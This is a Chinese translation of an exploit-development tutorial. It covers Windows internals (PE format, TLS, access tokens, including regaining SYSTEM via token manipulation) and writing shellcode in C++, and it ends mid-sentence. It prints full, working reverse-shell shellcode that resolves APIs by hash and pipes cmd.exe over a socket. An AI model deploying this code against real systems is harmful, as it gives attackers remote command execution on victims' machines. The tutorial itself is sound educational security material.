7

Exploit开发系列教程-Windows基础&shellcode | WooYun知识库

 6 years ago
source link:
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

Exploit开发系列教程-Windows基础&shellcode

from:http://expdev-kiuhnm.rhcloud.com/2015/05/11/contents/

Windows基础


0x00 Windows Basics

这篇文章简要讲述Windows开发者应该了解的一些常识。

0x01 Win32 API

Windows的主要API由多个DLLs(Dynamic Link Libraries)提供。某个应用可以从那些DLL中导入函数并且对它们进行调用。这样就保证了普通用户态应用程序的可移植性。

0x02 PE文件格式

执行体和DLL都是PE(Portable Executable)文件。每个PE含有一个导入和导出表。导入表指定导入函数以及这些函数所在的文件(模块)。导出表指定导出函数,等等。函数可以被导入到其它的PE文件。

PE文件由多个节(section)组成(代码节,数据节,等等…)。在内存中, .reloc节中具有重定位可执行体或DLL的信息。在内存中,虽然有些代码(例如相对的jmp指令)的地址是相对的,但是多数代码所在的地址是绝对的,这取决于被加载的模块。

Windows loader从当前工作目录开始搜索DLLs,发布的某个应用可能具有一个不同于系统根(\windows\system32)目录中的DLL。该版本方面的问题(不兼容)被一些人称作DLL-hell

重要的是理解相对虚拟内存地址 (Relative Virtual Address,RVA)的概念。PE文件提供RVAs来指定模块的相对基地址。换句话说,在内存中,如果某个模块在地址B(基地址)上被加载并且某个元素在该模块中具有RVA 为X这一偏移量,那么该元素的虚拟内存地址(Virtual Address,VA)偏移量为B+X

0x03 线程

如果你过去经常使用Windows平台,那么应该非常了解线程的概念。但是,如果你经常使用的是Linux,那么请记住,Windows平台将会为线程提供CPU时间片。你可以用CreateProcess()创建新进程并且用CreateThreads()创建新线程。线程会在它们所在进程的地址空间内执行,因此它们所在的内存是共享的。

线程也会被一种称作TLS(Thread Local Storage)的机制限制,该机制为线程提供了非共享内存。

基本上,每个线程的TEB都含有一个TLS数组,它具有64个DWORD值,并且在运行过程中超出TLS数组的有效元素个数时,会为额外的TLS数组分配1024个DWORD值。首先,两个数组中的一个数组的每个元素会对应一个索引值,该索引值必须被分配或使用TlsAlloc()来得到,可以用TlsGetValue(index) 来读取DWORD 值并用TlsSetValue(index, newValue)将其写入。如,在当前线程的TEB中,TlsGetValue(7)表示从TLS数组中索引值为7的地址上读取DWORD值。

笔记:我们可以通过使用GetCurrentThreadId()来模拟该机制,但是不会有一样的效果。

0x04 令牌

令牌通常用于描述访问权限。就像文件句柄那样,令牌仅仅是一个32位整数。每个进程具有一个内部结构,该结构含有关于访问权限的信息,它与令牌相关联。

令牌分为两种类型:主令牌和模仿令牌。无论何时,某个进程被创建后都会被分配一个主令牌。进程的每个线程都可以拥有进程的令牌,或从另一进程中获取模仿令牌。如果LogonUser()函数被调用,则会返回一个不能被使用于CreateProcessAsUser()的模仿令牌(提供凭据),除非你调用了DupcateTokenEx来将其转换为主令牌。

可以使用SetThreadToken(newToken) 将某个令牌附加到当前线程并且可以使用RevertToSelf()来将该令牌删除,从而让线程的令牌还原为主令牌。

我们来了解下在Windows平台上,将某个用户连接到服务器并发送用户名和密码的情况。首先以SYSTEM身份运行服务器,将会调用具有凭据的LogonUser(),如果成功则返回新令牌。接着会在服务器创建新线程的同时调用SetThreadToken(new_token),new_token参数是一个由 LogonUser()返回的令牌值。这样,线程被执行时就具有与用户一样的权限。当线程完成了对客户端的服务时,或者会被销毁,或者将调用revertToSelf() 而被添加到线程池的空闲线程队列中。

如果可以控制服务器,那么可通过调用RevertToSelf(),或在内存中查找其它的令牌并使用SetThreadToken()函数将它们附加到当前线程,从而恢复当前线程的权限,即SYSTEM权限。

值得注意的是,CreateProcess()使用主令牌作为新进程的令牌。当具有比主令牌更高权限的模仿令牌的线程调用CreateProcess()时存在一个问题,那就是新进程的权限会低于创建该进程的线程。

解决方案是使用DuplicateTokenEx()从当前线程的模拟令牌中创建一个新的主令牌,接着通过调用具有新的主令牌的CreateProcessAsUser() 创建新进程。

shellcode


0x00 介绍

Shellcode是一段被exploit作为payload发送的代码,它被注入到存在漏洞的应用,并且会被执行。Shellcode是自包含的,并且应该不含有null字节。通常使用函数如strcpy()来复制shellcode,在进行该复制过程中遇到null字节时,将停止复制。这样做会导致shellcode不能被完全复制。 Shellcode一般直接由汇编语言编写,但是,在这篇文章中,我们将通过Visual Studio 2013使用c/c++来开发shellcode。在该开发环境下进行开发的好处如下:

1.花费更短的开发时间。

2.智能提示(intellisense)。

3.易于调试。

我们将使用VS2013来生成一个具有shellcode的执行体,也将使用python脚本来提取并修复(移除null字节)shellcode

0x01 C/C++ 代码

仅仅使用栈变量

为了编写浮动地址代码(position independent code),我们必须使用栈变量。这意味着我们不能这么写。

char *v = new char[100];

因为那数组将被分配到栈。根据绝对地址,试着从msvcr120.dll 中调用new函数:

00191000 6A 64                push        64h
00191002 FF 15 90 20 19 00    call        dword ptr ds:[192090h]

地址192090h上包含函数的地址。在没有依赖导入表以及Windows loader的情况下,要调用某库中已导入的函数,我们必须直接这么做。 另一个存在的问题是,新操作符可能需要某种通过c/c++语言编写的运行时组件来完成的初始化操作。

不能使用全局变量:

int x;
 
int main() {
  x = 12;
}

上面的代码 (如果没有被优化)生成如下:

008E1C7E C7 05 30 91 8E 00 0C 00 00 00 mov         dword ptr ds:[8E9130h],0Ch

地址8E9130h为变量x的绝对地址。

如果我们编写如下,会导致字符串存在问题

char str[] = "I'm a string";

printf(str);

字符串将被放入执行体的.rdata节中,并且会对其进行绝对地址引用。

shellcode中不得使用printf:这只是一个了解str如何被引用的范例。

这是asm代码:

00A71006 8D 45 F0             lea         eax,[str]
00A71009 56                   push        esi
00A7100A 57                   push        edi
00A7100B BE 00 21 A7 00       mov         esi,0A72100h
00A71010 8D 7D F0             lea         edi,[str]
00A71013 50                   push        eax
00A71014 A5                   movs        dword ptr es:[edi],dword ptr [esi]
00A71015 A5                   movs        dword ptr es:[edi],dword ptr [esi]
00A71016 A5                   movs        dword ptr es:[edi],dword ptr [esi]
00A71017 A4                   movs        byte ptr es:[edi],byte ptr [esi]
00A71018 FF 15 90 20 A7 00    call        dword ptr ds:[0A72090h]

正如你所看到的,字符串位于.rdata节中,地址为A72100h,通过movsdmovsb指令的执行,它会被复制进栈(str指向栈)。注意:A72100h为绝对地址。显然该代码不是地址无关的。

如果我们这样写:

char *str = "I'm a string";
printf(str);

那么字符串仍然会被放入.data节,但不会被复制进栈:

00A31000 68 00 21 A3 00       push        0A32100h
00A31005 FF 15 90 20 A3 00    call        dword ptr ds:[0A32090h]

字符串在.rdata节中,绝对地址为A32100h

如何让该代码地址无关?

更简单的(部分)解决方案:

char str[] = { 'I', '\'', 'm', ' ', 'a', ' ', 's', 't', 'r', 'i', 'n', 'g', '\0' };
printf(str);

对应的汇编代码如下:

012E1006 8D 45 F0             lea         eax,[str]
012E1009 C7 45 F0 49 27 6D 20 mov         dword ptr [str],206D2749h
012E1010 50                   push        eax
012E1011 C7 45 F4 61 20 73 74 mov         dword ptr [ebp-0Ch],74732061h
012E1018 C7 45 F8 72 69 6E 67 mov         dword ptr [ebp-8],676E6972h
012E101F C6 45 FC 00          mov         byte ptr [ebp-4],0
012E1023 FF 15 90 20 2E 01    call        dword ptr ds:[12E2090h]

除了对printf的调用外,该段代码是地址无关的,因为字符串部分被直接编码进了mov指令的源操作数中。一旦该字符串在栈上,则可以被使用。

不幸的是,当字符串达到一定长度时,该方法就失效了。代码为:

char str[] = { 'I', '\'', 'm', ' ', 'a', ' ', 'v', 'e', 'r', 'y', ' ', 'l', 'o', 'n', 'g', ' ', 's', 't', 'r', 'i', 'n', 'g', '\0' };
printf(str);

生成

013E1006 66 0F 6F 05 00 21 3E 01 movdqa      xmm0,xmmword ptr ds:[13E2100h]
013E100E 8D 45 E8             lea         eax,[str]
013E1011 50                   push        eax
013E1012 F3 0F 7F 45 E8       movdqu      xmmword ptr [str],xmm0
013E1017 C7 45 F8 73 74 72 69 mov         dword ptr [ebp-8],69727473h
013E101E 66 C7 45 FC 6E 67    mov         word ptr [ebp-4],676Eh
013E1024 C6 45 FE 00          mov         byte ptr [ebp-2],0
013E1028 FF 15 90 20 3E 01    call        dword ptr ds:[13E2090h]

正如你所看到的,当字符串的其它部分像之前那样被编码进mov指令的源操作数中时,字符串部分将被定位在.rdata节中,地址为13E2100h。

我已提出的解决方案如下:

char *str = "I'm a very long string";

同时使用Python脚本修复shellcode。该脚本需要从.rdata节中提取被引用的字符串,并将它们放入到shellcode中,然后修复重定位信息。我们马上会了解到该实现方法。

不直接调用Windows API

C/C++代码中,我们不能编写

WaitForSingleObject(procInfo.hProcess, INFINITE);

因为kernel32.dll中已导入了“WaitForSingleObject”函数。

nutshell中,PE文件含有导入表和导入地址表(IAT)。导入表含有被导入到库中的函数的信息。当执行体被加载时,通过Windows loader编译IAT,并且其含有已导入的函数地址。该执行体的代码用间接寻址调用已导入到库中的函数。例如:

 001D100B FF 15 94 20 1D 00    call        dword ptr ds:[1D2094h]

地址1D2094h为入口地址(在IAT中),该地址含有函数 MessageBoxA的地址。因为如上调用函数的地址无需被修复(除非执行体被重定位),所以可以直接使用该地址。Windows loader 只需要修复的是在1D2094h地址,该dword值是MessageBoxA函数的地址。

解决方案是直接从Windows的数据结构中得到Windows的函数地址。之后我们将会了解到。

创建新项目

通过 File→New→Project…, 选择 Installed→Templates→Visual C++→Win32→Win32 Console Application, 为项目命名 (我将其命名为 shellcode) 接着点击OK。

通过 Project→<project name> properties 将出现新会话框。通过将 Configuration(会话的左上方)设置为All Configurations将修改应用到所有配置(ReleaseDebug)。接着,展开Configuration Properties并且在General 下修改Platform Toolset 。该编译器为Visual C++ Compiler Nov 2013 CTP (CTP_Nov2013)。

这样你将可以使用C++11C++14的一些特性,如static_assert

Shellcode范例

这是一段简单的反向shell代码(定义)。将命名为shellcode.cpp的文件添加到项目中并将该代码复制到shellcode.cpp。不要试图理解所有的代码。后面我们还会对其进行进一步的讨论。

// Simple reverse shell shellcode by Massimiliano Tomassoli (2015)
// NOTE: Compiled on Visual Studio 2013 + "Visual C++ Compiler November 2013 CTP".
 
#include <WinSock2.h>               // must preceed #include <windows.h>
#include <WS2tcpip.h>
#include <windows.h>
#include <winnt.h>
#include <winternl.h>
#include <stddef.h>
#include <stdio.h>
 
#define htons(A) ((((WORD)(A) & 0xff00) >> 8) | (((WORD)(A) & 0x00ff) << 8))
 
_inline PEB *getPEB() {
    PEB *p;
    __asm {
        mov     eax, fs:[30h]
        mov     p, eax
    }
    return p;
}
 
DWORD getHash(const char *str) {
    DWORD h = 0;
    while (*str) {
        h = (h >> 13) | (h << (32 - 13));       // ROR h, 13
        h += *str >= 'a' ? *str - 32 : *str;    // convert the character to uppercase
        str++;
    }
    return h;
}
 
DWORD getFunctionHash(const char *moduleName, const char *functionName) {
    return getHash(moduleName) + getHash(functionName);
}
 
LDR_DATA_TABLE_ENTRY *getDataTableEntry(const LIST_ENTRY *ptr) {
    int list_entry_offset = offsetof(LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
    return (LDR_DATA_TABLE_ENTRY *)((BYTE *)ptr - list_entry_offset);
}
 
// NOTE: This function doesn't work with forwarders. For instance, kernel32.ExitThread forwards to
//       ntdll.RtlExitUserThread. The solution is to follow the forwards manually.
PVOID getProcAddrByHash(DWORD hash) {
    PEB *peb = getPEB();
    LIST_ENTRY *first = peb->Ldr->InMemoryOrderModuleList.Flink;
    LIST_ENTRY *ptr = first;
    do {                            // for each module
        LDR_DATA_TABLE_ENTRY *dte = getDataTableEntry(ptr);
        ptr = ptr->Flink;
 
        BYTE *baseAddress = (BYTE *)dte->DllBase;
        if (!baseAddress)           // invalid module(???)
            continue;
        IMAGE_DOS_HEADER *dosHeader = (IMAGE_DOS_HEADER *)baseAddress;
        IMAGE_NT_HEADERS *ntHeaders = (IMAGE_NT_HEADERS *)(baseAddress + dosHeader->e_lfanew);
        DWORD iedRVA = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
        if (!iedRVA)                // Export Directory not present
            continue;
        IMAGE_EXPORT_DIRECTORY *ied = (IMAGE_EXPORT_DIRECTORY *)(baseAddress + iedRVA);
        char *moduleName = (char *)(baseAddress + ied->Name);
        DWORD moduleHash = getHash(moduleName);
 
        // The arrays pointed to by AddressOfNames and AddressOfNameOrdinals run in parallel, i.e. the i-th
        // element of both arrays refer to the same function. The first array specifies the name whereas
        // the second the ordinal. This ordinal can then be used as an index in the array pointed to by
        // AddressOfFunctions to find the entry point of the function.
        DWORD *nameRVAs = (DWORD *)(baseAddress + ied->AddressOfNames);
        for (DWORD i = 0; i < ied->NumberOfNames; ++i) {
            char *functionName = (char *)(baseAddress + nameRVAs[i]);
            if (hash == moduleHash + getHash(functionName)) {
                WORD ordinal = ((WORD *)(baseAddress + ied->AddressOfNameOrdinals))[i];
                DWORD functionRVA = ((DWORD *)(baseAddress + ied->AddressOfFunctions))[ordinal];
                return baseAddress + functionRVA;
            }
        }
    } while (ptr != first);
 
    return NULL;            // address not found
}
 
#define HASH_LoadLibraryA           0xf8b7108d
#define HASH_WSAStartup             0x2ddcd540
#define HASH_WSACleanup             0x0b9d13bc
#define HASH_WSASocketA             0x9fd4f16f
#define HASH_WSAConnect             0xa50da182
#define HASH_CreateProcessA         0x231cbe70
#define HASH_inet_ntoa              0x1b73fed1
#define HASH_inet_addr              0x011bfae2
#define HASH_getaddrinfo            0xdc2953c9
#define HASH_getnameinfo            0x5c1c856e
#define HASH_ExitThread             0x4b3153e0
#define HASH_WaitForSingleObject    0xca8e9498
 
#define DefineFuncPtr(name)     decltype(name) *My_##name = (decltype(name) *)getProcAddrByHash(HASH_##name)
 
int entryPoint() {
//  printf("0x%08x\n", getFunctionHash("kernel32.dll", "WaitForSingleObject"));
//  return 0;
 
    // NOTE: we should call WSACleanup() and freeaddrinfo() (after getaddrinfo()), but
    //       they're not strictly needed.
 
    DefineFuncPtr(LoadLibraryA);
 
    My_LoadLibraryA("ws2_32.dll");
 
    DefineFuncPtr(WSAStartup);
    DefineFuncPtr(WSASocketA);
    DefineFuncPtr(WSAConnect);
    DefineFuncPtr(CreateProcessA);
    DefineFuncPtr(inet_ntoa);
    DefineFuncPtr(inet_addr);
    DefineFuncPtr(getaddrinfo);
    DefineFuncPtr(getnameinfo);
    DefineFuncPtr(ExitThread);
    DefineFuncPtr(WaitForSingleObject);
 
    const char *hostName = "127.0.0.1";
    const int hostPort = 123;
 
    WSADATA wsaData;
 
    if (My_WSAStartup(MAKEWORD(2, 2), &wsaData))
        goto __end;         // error
    SOCKET sock = My_WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    if (sock == INVALID_SOCKET)
        goto __end;
 
    addrinfo *result;
    if (My_getaddrinfo(hostName, NULL, NULL, &result))
        goto __end;
    char ip_addr[16];
    My_getnameinfo(result->ai_addr, result->ai_addrlen, ip_addr, sizeof(ip_addr), NULL, 0, NI_NUMERICHOST);
 
    SOCKADDR_IN remoteAddr;
    remoteAddr.sin_family = AF_INET;
    remoteAddr.sin_port = htons(hostPort);
    remoteAddr.sin_addr.s_addr = My_inet_addr(ip_addr);
 
    if (My_WSAConnect(sock, (SOCKADDR *)&remoteAddr, sizeof(remoteAddr), NULL, NULL, NULL, NULL))
        goto __end;
 
    STARTUPINFOA sInfo;
    PROCESS_INFORMATION procInfo;
    SecureZeroMemory(&sInfo, sizeof(sInfo));        // avoids a call to _memset
    sInfo.cb = sizeof(sInfo);
    sInfo.dwFlags = STARTF_USESTDHANDLES;
    sInfo.hStdInput = sInfo.hStdOutput = sInfo.hStdError = (HANDLE)sock;
    My_CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &sInfo, &procInfo);
 
    // Waits for the process to finish.
    My_WaitForSingleObject(procInfo.hProcess, INFINITE);
 
__end:
    My_ExitThread(0);
 
    return 0;
}
 
int main() {
    return entryPoint();
}

编译器配置

通过Project→<project name> properties, 展开 Configuration Properties 接着选择 C/C++。应用修改后的Release 配置。

这里是需要修改的设置:

  • General:

    • oSDL Checks: No (/sdl-)

这可能并不需要,但是我已将它们关闭了。

  • Optimization:

    • Optimization: Minimize Size (/O1)

这很重要!我们得尽可能将shellcode简短。

* Inline Function Expansion: Only __inline (/Ob1)

使用这个设置告诉VS 2013只用_inline来定义内联函数。 main() 仅调用shellcode的函数entryPoint。如果函数 entryPoint是简短的,那么它可能会被内联进main()。这将是极糟的,因为main()将不再透露shellcode的后一部分(事实上它包含了该部分)。后面会了解到原因。

* Enable Intrinsic Functions: Yes (/Oi)

我不知道该设置是否应该关闭。

* Favor Size Or Speed: Favor small code (/Os)

* Whole Program Optimization: Yes (/GL)
  • Code Generation:

    • Security Check: Disable Security Check (/GS-)

不需要安全检查!

* Enable Function-Level linking: Yes (/Gy)

linker配置

通过Project→<project name> properties, 展开Configuration Properties接着查看Linker。应用修改后的Release配置。这里是你需要修改的相关设置:

  • General:

    • Enable Incremental Linking: No (/INCREMENTAL:NO)
  • Debugging:

    • Generate Map File: Yes (/MAP)

告诉linker生成含有EXE结构的映射文件。

* Map File Name: mapfile

这是映射文件名。可自定义文件名。

  • Optimization:

    • References: Yes (/OPT:REF)

该选项对于生成简短的shellcode来说非常重要,因为可以除去函数以及不被代码引用的数据。

* Enable COMDAT Folding: Yes (/OPT:ICF)

* Function Order: function_order.txt

应用该设置读取命名为function_order.txt 的文件,该文件指定必须出现在代码节中函数的顺序。我们要将函数 entryPoint变为代码节中的第一个函数,可想而知,function_order.txt中必存在一行代码含有字符串?entryPoint@@YAHXZ。可以在映射文件中找到该函数名。

getProcAddrByHash

该函数返回由某个出现在内存中的模块(.exe.dll)导出的某个函hash数的地址,已给出的``值与模块和函数相关联。当然,通过名字查找函数具有一定的可能性,但是这样做需要考虑空间方面的问题,因为那些名字应该被包含在shellcode中。在另一方面,一个hash仅有4个字节。因为我们不使用两个hash(一个用于模块,一个用于函数),getProcAddrByHash需要考虑所有被加载进内存中的模块。

通过user32.dll导出函数MessageBoxA,该函数的hash值可通过如下方法计算:

DWORD hash = getFunctionHash("user32.dll", "MessageBoxA");

计算出的hash值为getHash(“user32.dll”) 与getHash(“MessageBoxA”)的hash值的总和。函数getHash的实现简明易懂:

DWORD getHash(const char *str) {
    DWORD h = 0;
    while (*str) {
        h = (h >> 13) | (h << (32 - 13));       // ROR h, 13
        h += *str >= 'a' ? *str - 32 : *str;    // convert the character to uppercase
        str++;
    }
    return h;
}

正如你可以了解到的,hash值是大小写不敏感的(不区分大小写),重要的是,因为在内存中,某种Windows的版本所使用的字符串都为大写。 首先,getProcAddrByHash获取TEB(Thread Environment Block)的地址:

PEB *peb = getPEB();

where

_inline PEB *getPEB() {
    PEB *p;
    __asm {
        mov     eax, fs:[30h]
        mov     p, eax
    }
    return p;
}

选择子fs与某个始于TEB地址的段相关联。在偏移30h上,TEB含有一个PEB(Process Environment Block)指针。用WinDbg可以观察到:

0:000> dt _TEB @$teb
ntdll!_TEB
+0x000 NtTib            : _NT_TIB
+0x01c EnvironmentPointer : (null)
+0x020 ClientId         : _CLIENT_ID
+0x028 ActiveRpcHandle  : (null)
+0x02c ThreadLocalStoragePointer : 0x7efdd02c Void
+0x030 ProcessEnvironmentBlock : 0x7efde000 _PEB
+0x034 LastErrorValue   : 0
+0x038 CountOfOwnedCriticalSections : 0
+0x03c CsrClientThread  : (null)
<snip>

PEB与当前的进程相关联,除了别的以外,含有关于某些模块的信息,这些模块都被加载到进程地址空间中。 此处又是getProcAddrByHash

PVOID getProcAddrByHash(DWORD hash) {
    PEB *peb = getPEB();
    LIST_ENTRY *first = peb->Ldr->InMemoryOrderModuleList.Flink;
    LIST_ENTRY *ptr = first;
    do {                            // for each module
        LDR_DATA_TABLE_ENTRY *dte = getDataTableEntry(ptr);
        ptr = ptr->Flink;
        .
        .
        .
    } while (ptr != first);
 
    return NULL;            // address not found
}

此处为PEB部分:

0:000> dt _PEB @$peb
ntdll!_PEB
   +0x000 InheritedAddressSpace : 0 ''
   +0x001 ReadImageFileExecOptions : 0 ''
   +0x002 BeingDebugged    : 0x1 ''
   +0x003 BitField         : 0x8 ''
   +0x003 ImageUsesLargePages : 0y0
   +0x003 IsProtectedProcess : 0y0
   +0x003 IsLegacyProcess  : 0y0
   +0x003 IsImageDynamicallyRelocated : 0y1
   +0x003 SkipPatchingUser32Forwarders : 0y0
   +0x003 SpareBits        : 0y000
   +0x004 Mutant           : 0xffffffff Void
   +0x008 ImageBaseAddress : 0x00060000 Void
   +0x00c Ldr              : 0x76fd0200 _PEB_LDR_DATA
   +0x010 ProcessParameters : 0x00681718 _RTL_USER_PROCESS_PARAMETERS
   +0x014 SubSystemData    : (null)
   +0x018 ProcessHeap      : 0x00680000 Void
   <snip>

在偏移0Ch上,是一个被称作Ldr的字段,它是个PEB_LDR_DATA 结构指针。使用WinDbg进行观察:

0:000> dt _PEB_LDR_DATA 0x76fd0200
ntdll!_PEB_LDR_DATA
   +0x000 Length           : 0x30
   +0x004 Initialized      : 0x1 ''
   +0x008 SsHandle         : (null)
   +0x00c InLoadOrderModuleList : _LIST_ENTRY [ 0x683080 - 0x6862c0 ]
   +0x014 InMemoryOrderModuleList : _LIST_ENTRY [ 0x683088 - 0x6862c8 ]
   +0x01c InInitializationOrderModuleList : _LIST_ENTRY [ 0x683120 - 0x6862d0 ]
   +0x024 EntryInProgress  : (null)
   +0x028 ShutdownInProgress : 0 ''
   +0x02c ShutdownThreadId : (null)

InMemoryOrderModuleList是一个LDR_DATA_TABLE_ENTRY结构的双链表,它与当前进程的地址空间中所加载的模块相关联。更确切地说,InMemoryOrderModuleList 是一个LIST_ENTRY,它含有两个部分:

0:000> dt _LIST_ENTRY
ntdll!_LIST_ENTRY
+0x000 Flink            : Ptr32 _LIST_ENTRY
+0x004 Blink            : Ptr32 _LIST_ENTRY

Flink为前向链表,Blink为后向链表。Flink指向第一个模块的LDR_DATA_TABLE_ENTRY 。当然,未必就是如此:

Flink指向一个被包含在结构LDR_DATA_TABLE_ENTRY中的LIST_ENTRY 结构。

我们来观察LDR_DATA_TABLE_ENTRY 是如何被定义的:

0:000> dt _LDR_DATA_TABLE_ENTRY
ntdll!_LDR_DATA_TABLE_ENTRY
+0x000 InLoadOrderLinks : _LIST_ENTRY
+0x008 InMemoryOrderLinks : _LIST_ENTRY
+0x010 InInitializationOrderLinks : _LIST_ENTRY
+0x018 DllBase          : Ptr32 Void
+0x01c EntryPoint       : Ptr32 Void
+0x020 SizeOfImage      : Uint4B
+0x024 FullDllName      : _UNICODE_STRING
+0x02c BaseDllName      : _UNICODE_STRING
+0x034 Flags            : Uint4B
+0x038 LoadCount        : Uint2B
+0x03a TlsIndex         : Uint2B
+0x03c HashLinks        : _LIST_ENTRY
+0x03c SectionPointer   : Ptr32 Void
+0x040 CheckSum         : Uint4B
+0x044 TimeDateStamp    : Uint4B
+0x044 LoadedImports    : Ptr32 Void
+0x048 EntryPointActivationContext : Ptr32 _ACTIVATION_CONTEXT
+0x04c PatchInformation : Ptr32 Void
+0x050 ForwarderLinks   : _LIST_ENTRY
+0x058 ServiceTagLinks  : _LIST_ENTRY
+0x060 StaticLinks      : _LIST_ENTRY
+0x068 ContextInformation : Ptr32 Void
+0x06c OriginalBase     : Uint4B
+0x070 LoadTime         : _LARGE_INTEGER

InMemoryOrderModuleList.Flink指向位于偏移为8的_LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks,因此,我们必须减去8来获取 _LDR_DATA_TABLE_ENTRY的地址。

首先,获取Flink指针:

+0x00c InLoadOrderModuleList : _LIST_ENTRY [ 0x683080 - 0x6862c0 ]

它的值是0x683080,因此_LDR_DATA_TABLE_ENTRY 结构的地址为0x683080 – 8 = 0x683078:

0:000> dt _LDR_DATA_TABLE_ENTRY 683078
ntdll!_LDR_DATA_TABLE_ENTRY
   +0x000 InLoadOrderLinks : _LIST_ENTRY [ 0x359469e5 - 0x1800eeb1 ]
   +0x008 InMemoryOrderLinks : _LIST_ENTRY [ 0x683110 - 0x76fd020c ]
   +0x010 InInitializationOrderLinks : _LIST_ENTRY [ 0x683118 - 0x76fd0214 ]
   +0x018 DllBase          : (null)
   +0x01c EntryPoint       : (null)
   +0x020 SizeOfImage      : 0x60000
   +0x024 FullDllName      : _UNICODE_STRING "蒮m쿟ᄍ엘ᆲ膪n???"
   +0x02c BaseDllName      : _UNICODE_STRING "C:\Windows\SysWOW64\calc.exe"
   +0x034 Flags            : 0x120010
   +0x038 LoadCount        : 0x2034
   +0x03a TlsIndex         : 0x68
   +0x03c HashLinks        : _LIST_ENTRY [ 0x4000 - 0xffff ]
   +0x03c SectionPointer   : 0x00004000 Void
   +0x040 CheckSum         : 0xffff
   +0x044 TimeDateStamp    : 0x6841b4
   +0x044 LoadedImports    : 0x006841b4 Void
   +0x048 EntryPointActivationContext : 0x76fd4908 _ACTIVATION_CONTEXT
   +0x04c PatchInformation : 0x4ce7979d Void
   +0x050 ForwarderLinks   : _LIST_ENTRY [ 0x0 - 0x0 ]
   +0x058 ServiceTagLinks  : _LIST_ENTRY [ 0x6830d0 - 0x6830d0 ]
   +0x060 StaticLinks      : _LIST_ENTRY [ 0x6830d8 - 0x6830d8 ]
   +0x068 ContextInformation : 0x00686418 Void
   +0x06c OriginalBase     : 0x6851a8
   +0x070 LoadTime         : _LARGE_INTEGER 0x76f0c9d0

正如你可以看到的,我正在用WinDbg调试calc.exe!不错:第一个模块是执行体本身。重要的是DLLBase (c)字段。根据给出的模块的基地址,我们可以分析被加载到内存中的PE文件并获取所有信息,如已导出的函数地址。 在getProcAddrByHash中我们所做的:

 

BYTE *baseAddress = (BYTE *)dte->DllBase;
    if (!baseAddress)           // invalid module(???)
        continue;
    IMAGE_DOS_HEADER *dosHeader = (IMAGE_DOS_HEADER *)baseAddress;
    IMAGE_NT_HEADERS *ntHeaders = (IMAGE_NT_HEADERS *)(baseAddress + dosHeader->e_lfanew);
    DWORD iedRVA = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    if (!iedRVA)                // Export Directory not present
        continue;
    IMAGE_EXPORT_DIRECTORY *ied = (IMAGE_EXPORT_DIRECTORY *)(baseAddress + iedRVA);
    char *moduleName = (char *)(baseAddress + ied->Name);
    DWORD moduleHash = getHash(moduleName);
 
    // The arrays pointed to by AddressOfNames and AddressOfNameOrdinals run in parallel, i.e. the i-th
    // element of both arrays refer to the same function. The first array specifies the name whereas
    // the second the ordinal. This ordinal can then be used as an index in the array pointed to by
    // AddressOfFunctions to find the entry point of the function.
    DWORD *nameRVAs = (DWORD *)(baseAddress + ied->AddressOfNames);
    for (DWORD i = 0; i < ied->NumberOfNames; ++i) {
        char *functionName = (char *)(baseAddress + nameRVAs[i]);
        if (hash == moduleHash + getHash(functionName)) {
            WORD ordinal = ((WORD *)(baseAddress + ied->AddressOfNameOrdinals))[i];
            DWORD functionRVA = ((DWORD *)(baseAddress + ied->AddressOfFunctions))[ordinal];
            return baseAddress + functionRVA;
        }
    }
    .
    .
    .

了解PE文件格式的规范可以更好地理解该段代码,这里不详细讲解。在PE文件结构中需要注意的是RVA(Relative Virtual Addresses)。即相对于PE模块(Dllbase)中基地址的地址。例如,如果RVA100h并且DllBase400000h,那么指向数据的RVA400000h + 100h = 400100h。 该模块始于DOS_HEADER 。它包含一个NT_HEADERSRVA(e_lfanew)。FILE_HEADEROPTIONAL_HEADERNT_HEADERS存在于NT_HEADERSOPTIONAL_HEADER含有一个被称作DataDirectory的数组,该数组指向PE模块的多个目录。了解Export Directory可参考链接https://msdn.microsoft.com/en-us/library/ms809762.aspx中提到的相关细节。

如下C结构体与Export Directory相关联,其定义如下:

typedef struct _IMAGE_EXPORT_DIRECTORY {
    DWORD   Characteristics;
    DWORD   TimeDateStamp;
    WORD    MajorVersion;
    WORD    MinorVersion;
    DWORD   Name;
    DWORD   Base;
    DWORD   NumberOfFunctions;
    DWORD   NumberOfNames;
    DWORD   AddressOfFunctions;     // RVA from base of image
    DWORD   AddressOfNames;         // RVA from base of image
    DWORD   AddressOfNameOrdinals;  // RVA from base of image
} IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;

DefineFuncPtr

DefineFuncPtr 是一个宏,它有助于定义一个已导入的函数指针. 这是范例:

#define HASH_WSAStartup           0x2ddcd540
 
#define DefineFuncPtr(name)       decltype(name) *My_##name = (decltype(name) *)getProcAddrByHash(HASH_##name)
 
DefineFuncPtr(WSAStartup);

WSAStartup函数是ws2_32.dll中已导入的函数,因此通过该方法计算HASH_WSAStartup

DWORD hash = getFunctionHash("ws2_32.dll", "WSAStartup");

当宏被展开时,

DefineFuncPtr(WSAStartup);

变为

decltype(WSAStartup) *My_WSAStartup = (decltype(WSAStartup) *)getProcAddrByHash(HASH_WSAStartup)

decltype(WSAStartup)为 WSAStartup函数的类型。这样,我们无需重定义函数原型。注意:在C++11中有关于 decltype的描述。

现在我们可通过My_WSAStartup调用 WSAStartup

注意:从模块中导入函数之前,我们需要确保已经在内存中加载了这个模块。

最简单的方法是使用LoadLibrary加载模块。

DefineFuncPtr(LoadLibraryA);
  My_LoadLibraryA("ws2_32.dll");

该操作有效,因为kernel32.dll 中已导入了LoadLibrary,正如我们说过的,它总会出现在内存中。

我们也可以导入GetProcAddress并使用它来获取所有其它我们需要的函数地址,但是没必要这么做,因为我们需要将所有的函数名包含在shellcode中。

entryPoint

显然,entryPointshellcode和实现反向shell的入口点。首先,我们导入所有我们需要的函数,接着我们使用它们。细节不重要并且我不得不说winsock API的使用非常麻烦。

nutshell中:

